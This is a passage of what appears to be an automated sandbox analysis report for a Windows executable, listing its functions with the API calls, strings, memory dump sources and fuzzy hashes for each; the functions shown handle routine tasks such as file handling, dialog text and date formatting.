                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0043C3B8
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0043C3D4
                                                              • _swprintf.LIBCMT ref: 0043C404
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0043C417
                                                              • FindClose.KERNEL32(00000000), ref: 0043C41E
                                                              • _swprintf.LIBCMT ref: 0043C477
                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0043C48A
                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0043C4A7
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0043C4C7
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0043C4D7
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0043C4F1
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0043C509
                                                              • _swprintf.LIBCMT ref: 0043C535
                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0043C548
                                                              • _swprintf.LIBCMT ref: 0043C59C
                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0043C5AF
                                                                • Part of subcall function 0043AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0043AF35
                                                                • Part of subcall function 0043AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0045E72C,?,?), ref: 0043AF84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                              • String ID: %s %s$%s %s %s$PC$REPLACEFILEDLG
                                                              • API String ID: 797121971-800292204
                                                              • Opcode ID: 01f39eb7e200f546b80c7fc43a86fb2806e7804e580e994b0d03c406d3adccbf
                                                              • Instruction ID: a86dd6c8076143d6de5025e5a6fc0bbe403208d35086a44a3eb74ecf6361b001
                                                              • Opcode Fuzzy Hash: 01f39eb7e200f546b80c7fc43a86fb2806e7804e580e994b0d03c406d3adccbf
                                                              • Instruction Fuzzy Hash: 8091D572648344BBD221DFA0DC89FFB77ACEB49B05F40482EF645D6181D779EA04872A
                                                              Function 00426FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00426FAA
                                                              • _wcslen.LIBCMT ref: 00427013
                                                              • _wcslen.LIBCMT ref: 00427084
                                                                • Part of subcall function 00427A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00427AAB
                                                                • Part of subcall function 00427A9C: GetLastError.KERNEL32 ref: 00427AF1
                                                                • Part of subcall function 00427A9C: CloseHandle.KERNEL32(?), ref: 00427B00
                                                                • Part of subcall function 0042A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0042977F,?,?,004295CF,?,?,?,?,?,00452641,000000FF), ref: 0042A1F1
                                                                • Part of subcall function 0042A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0042977F,?,?,004295CF,?,?,?,?,?,00452641), ref: 0042A21F
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00427139
                                                              • CloseHandle.KERNEL32(00000000), ref: 00427155
                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00427298
                                                                • Part of subcall function 00429DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004273BC,?,?,?,00000000), ref: 00429DBC
                                                                • Part of subcall function 00429DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00429E70
                                                                • Part of subcall function 00429620: CloseHandle.KERNELBASE(000000FF,?,?,004295D6,?,?,?,?,?,00452641,000000FF), ref: 0042963B
                                                                • Part of subcall function 0042A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0042A325,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A501
                                                                • Part of subcall function 0042A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0042A325,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3983180755-3508440684
                                                              • Opcode ID: 5b3ad1833a5700119e1bf89eb8a20df47cf1452b9c2a241884393650cb3d55fc
                                                              • Instruction ID: dd93a4991183b27fcc151d5c98afbbc035956054be5a11d054d83f2b117d474d
                                                              • Opcode Fuzzy Hash: 5b3ad1833a5700119e1bf89eb8a20df47cf1452b9c2a241884393650cb3d55fc
                                                              • Instruction Fuzzy Hash: 99C1EA71A04624AADB21DB75EC41FEFB3A8AF04344F40455FF956E3282D738AA44CB69
                                                              Function 0044D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              • Opcode ID: 3e9eba96815001e895c17f5d6edae3fccf801edadd7a21f9caa6dabb630f8bea
                                                              • Instruction ID: 43356909924e8acf8875cb3a5a82a17f7844a09906820ae04e9bf7e2a43fcc14
                                                              • Opcode Fuzzy Hash: 3e9eba96815001e895c17f5d6edae3fccf801edadd7a21f9caa6dabb630f8bea
                                                              • Instruction Fuzzy Hash: 82C24871E086288FEB25CE299D407EAB7B5FB48305F1441EBD84DE7241E778AE818F45
                                                              Function 004232F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog_swprintf
                                                              • String ID: CMT$h%u$hc%u
                                                              • API String ID: 146138363-3282847064
                                                              • Opcode ID: 847f019d5384544eade39b8d317b6da42749736b2f3acb16bc2273ec2d2f3e13
                                                              • Instruction ID: e6cb333b016104d60eae0b2c75421d9ac4efca7bdca6049377629cadfeeba4b1
                                                              • Opcode Fuzzy Hash: 847f019d5384544eade39b8d317b6da42749736b2f3acb16bc2273ec2d2f3e13
                                                              • Instruction Fuzzy Hash: 993206716002949BDB14DF75D895AEA3BA5AF14304F84047FFD8A8B282DB7CAA49CB14
                                                              Function 0042286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00422874
                                                              • _strlen.LIBCMT ref: 00422E3F
                                                                • Part of subcall function 004302BA: __EH_prolog.LIBCMT ref: 004302BF
                                                                • Part of subcall function 00431B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0042BAE9,00000000,?,?,?,00010484), ref: 00431BA0
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00422F91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                              • String ID: CMT
                                                              • API String ID: 1206968400-2756464174
                                                              • Opcode ID: 4ae93c7bff45487fa0e56e54d968c9c12bf214ca87108eb51138e02bd9573b32
                                                              • Instruction ID: 9c6623a3ded838ead9464bd28996db601287a1314fc007ebdc819a61e91fffae
                                                              • Opcode Fuzzy Hash: 4ae93c7bff45487fa0e56e54d968c9c12bf214ca87108eb51138e02bd9573b32
                                                              • Instruction Fuzzy Hash: 3A6228717002549FDB19DF34E9856EA3BA1AF14304F48457FEC9A8B382D7BCA945CB28
                                                              Function 0043F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043F844
                                                              • IsDebuggerPresent.KERNEL32 ref: 0043F910
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043F930
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043F93A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 070c23d94a51bc210bfcef13d86711301551260162b5e91a7630486f57c4e9c1
                                                              • Instruction ID: cbd0e6b8795a24b4ad3be3bbb3334bf05a4865e22ec17d132dbb7f5629fda5a5
                                                              • Opcode Fuzzy Hash: 070c23d94a51bc210bfcef13d86711301551260162b5e91a7630486f57c4e9c1
                                                              • Instruction Fuzzy Hash: D5312B75D0531D9BDB11DFA4D9897CDBBB8AF08705F1040AAE40CA7250EB759B888F48
                                                              Function 0043E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualQuery.KERNEL32(80000000,0043E5E8,0000001C,0043E7DD,00000000,?,?,?,?,?,?,?,0043E5E8,00000004,00481CEC,0043E86D), ref: 0043E6B4
                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0043E5E8,00000004,00481CEC,0043E86D), ref: 0043E6CF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: InfoQuerySystemVirtual
                                                              • String ID: D
                                                              • API String ID: 401686933-2746444292
                                                              • Opcode ID: 291cd53576b6d95e2506846f52506b0355e51f22bf7623bd3c6f407bf53ad828
                                                              • Instruction ID: a6a0c122626bdd44104274e70204d4b4abda00eae7f2e0dd9ae84b30335c62b2
                                                              • Opcode Fuzzy Hash: 291cd53576b6d95e2506846f52506b0355e51f22bf7623bd3c6f407bf53ad828
                                                              • Instruction Fuzzy Hash: 42012B326002096BDF14DE6ADC49BDE7BAAEFC8325F0CC121ED19D7290DB38DD058684
                                                              Function 00448EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00448FB5
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00448FBF
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00448FCC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: e8b24e77fcd2816877587030b1255c30695d53d4602b120bc287118242fc273d
                                                              • Instruction ID: f74cdc02b3a43f17764e9d21b6766be09186057fbd78e9adce06f88abaa19d49
                                                              • Opcode Fuzzy Hash: e8b24e77fcd2816877587030b1255c30695d53d4602b120bc287118242fc273d
                                                              • Instruction Fuzzy Hash: 1A31D57490131CABCB21DF25D888B9DBBB8AF08311F5041EAE41CA6251EB349F858F48
                                                              Function 0044D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                              • Instruction ID: be6e55717fccfc0207be28e1e05bd49a65fcc2ac69eaeb74caa2d978b3125bd6
                                                              • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                              • Instruction Fuzzy Hash: 46022C71E002199BEF14DFA9C9806AEB7F1EF88314F25816AD919E7384D734AE41CB94
                                                              Function 0043AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0043AF35
                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0045E72C,?,?), ref: 0043AF84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FormatInfoLocaleNumber
                                                              • String ID:
                                                              • API String ID: 2169056816-0
                                                              • Opcode ID: cc7db4d6a2fd2f9a2d9bd3de02cd0c6bb1b55e65fd14a88ba9e562da1a067019
                                                              • Instruction ID: de7b2d2171537b92533d250ce8d695b5e9defd5a06b2aa169ee1035dd64f5949
                                                              • Opcode Fuzzy Hash: cc7db4d6a2fd2f9a2d9bd3de02cd0c6bb1b55e65fd14a88ba9e562da1a067019
                                                              • Instruction Fuzzy Hash: E2015A3A110308AAD7119F75EC45F9A77B8EF0C751F109032FA09A7191E374AA288BA9
                                                              Function 00426C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00426DDF,00000000,00000400), ref: 00426C74
                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00426C95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 09616acb62f45d14e2985008adff2f10b5554e1012b9a1b973eb2b32cb8b8c33
                                                              • Instruction ID: 2ea2d9cb067944d3a8894145129a794b2fb75499d5e2e89bd7dc4492eb0efd75
                                                              • Opcode Fuzzy Hash: 09616acb62f45d14e2985008adff2f10b5554e1012b9a1b973eb2b32cb8b8c33
                                                              • Instruction Fuzzy Hash: CED05230344300BAEA011F229C06F2B2B98AB40B82FA8C014B680A80E1CA78C820A62D
                                                              Function 004519F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004519EF,?,?,00000008,?,?,0045168F,00000000), ref: 00451C21
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: ff5d203d27c39763558c0d6a4d406ce2300878acba6f6aec634fe2d37a557c48
                                                              • Instruction ID: 312e5b41d1d0c7d0c4d377ff8b28a006156cb23195a5b6869e3c9c89a3e17402
                                                              • Opcode Fuzzy Hash: ff5d203d27c39763558c0d6a4d406ce2300878acba6f6aec634fe2d37a557c48
                                                              • Instruction Fuzzy Hash: 85B14C352106089FD715CF28C486B657BE0FF45366F258659E89ACF3A2C33AED86CB44
                                                              Function 0043F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0043F66A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: 9cc9f5bf16212c2d413c48c364810e7cff55a9b6f14809b71acb5822b91acab8
                                                              • Instruction ID: f6dd8fc9353bf5af9bd67b2d71957d9bbb71e6ddc9ca35483192e5bd94e8d9f7
                                                              • Opcode Fuzzy Hash: 9cc9f5bf16212c2d413c48c364810e7cff55a9b6f14809b71acb5822b91acab8
                                                              • Instruction Fuzzy Hash: 4F515971D006099FEB28CF95E8817AABBF4FB48304F24983AC411EB361D378E905CB58
                                                              Function 0042B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 0042B16B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: 3b7b638fef345a6e7616c5209d2156628dde53720b4a06c21c98aeb1fb2d57d7
                                                              • Instruction ID: 71e48fecd1f81d950dca0ea22982df8b0c9c82285e013eb59b37529b34c9b2e0
                                                              • Opcode Fuzzy Hash: 3b7b638fef345a6e7616c5209d2156628dde53720b4a06c21c98aeb1fb2d57d7
                                                              • Instruction Fuzzy Hash: 33F030B4E002588FDB18CF18EC916EA73F1F748755F1442A6D515937A1D3B4EA80CEA9
                                                              Function 004240FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
